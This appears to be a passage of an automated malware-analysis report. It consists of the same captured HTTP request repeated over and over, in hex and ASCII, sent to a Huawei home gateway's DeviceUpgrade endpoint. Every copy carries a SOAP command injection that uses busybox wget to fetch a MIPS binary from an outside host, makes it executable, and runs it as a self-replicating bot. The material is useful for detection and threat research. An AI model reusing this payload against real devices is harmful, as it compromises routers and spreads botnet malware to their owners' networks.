74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 